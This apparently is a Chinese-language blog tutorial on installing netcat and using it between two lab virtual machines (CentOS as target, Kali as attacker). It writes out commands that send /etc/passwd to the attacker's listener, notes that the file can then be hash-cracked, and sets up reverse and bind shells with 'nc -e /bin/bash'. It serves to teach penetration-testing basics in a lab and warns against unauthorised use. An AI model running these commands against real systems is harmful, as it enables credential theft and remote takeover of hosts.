nc的安装和简单操作

nc的安装和简单操作
一.下载nc(这里我用的是yum源的下载)
命令: yum install -y ncnc的安装和简单操作_第1张图片

二.实现连接通信操作
(我这里用的是两台虚拟机相互通信, 分别是contos 7 x86版 和 kali 2022版,这里可以把contos当作靶机,kali当作客户端)

1.查找kali的ip地址
命令:ifconfig
nc的安装和简单操作_第2张图片
2.利用nc 打开端口进行监听(这里我打开的是9999端口)
命令:nc -lnvp 9999
nc的安装和简单操作_第3张图片
这样就说明已经开始监听了。

3.打开contos 7 连接kali
命令:nc 192.168.116.xxx 9999
nc的安装和简单操作_第4张图片
输入hello world 后回车 然后我们打开kali,再kali中看到监听的结果
nc的安装和简单操作_第5张图片

三.传输文件内容
1.在客户端(kali)建立一个文件1.txt,用户接受通信
命令:nc -lvp 9999 >1.txt
nc的安装和简单操作_第6张图片

2.在服务端(contos 7)传送服务端密码
命令:nc 192.168.116.xxx 9999 < /etc/passwd
(如果权限不够,请学习上一篇的漏洞复现,我有讲如何操作)
在这里插入图片描述
3.观察客户端是否有文件传输进来
命令:cat 1.txt
nc的安装和简单操作_第7张图片
那么我们如何确定传输的内容是刚监听到的呢?

4.查看服务端(contos 7中/etc/paaswd文件夹)进行对比。
命令:cat /etc/passwd
nc的安装和简单操作_第8张图片

小结:通过对比发现,数据是一致的,所以在做渗透测试中,如果你和对方的主机进行了通信,那么你就可以获取文件进行破解,
提升:各位小伙伴可以和我一样开两个虚拟机进行实验,不可以在他人未授权的情况下连接他人主机进行通信。
获取密码也是一样,得到文件后进行哈希破解,在这里就不讲了。

四.获取shell(控制权限)
1.逆向shell
(1)监听端口(kali中输入)
命令:nc -lvp 9999
(2)通过contos连接shell
命令:nc 192.168.116.xxx 9999 -e /bin/bash
在这里插入图片描述
(3)Kali中查看是否获得了shell权限
nc的安装和简单操作_第9张图片

2.正向shell
(1)打开contos的监听
命令:nc -lvp 6666 -e /bin/bash
nc的安装和简单操作_第10张图片
(2)查看contos的ip
命令:ip -a
这里很简单就不说了
(3)Kali进行连接
nc的安装和简单操作_第11张图片
在这里我们可以看到连接没有问题,那么其他操作和前面一致.
**

今天就介绍到这

**

你可能感兴趣的:(安全,linux,web安全)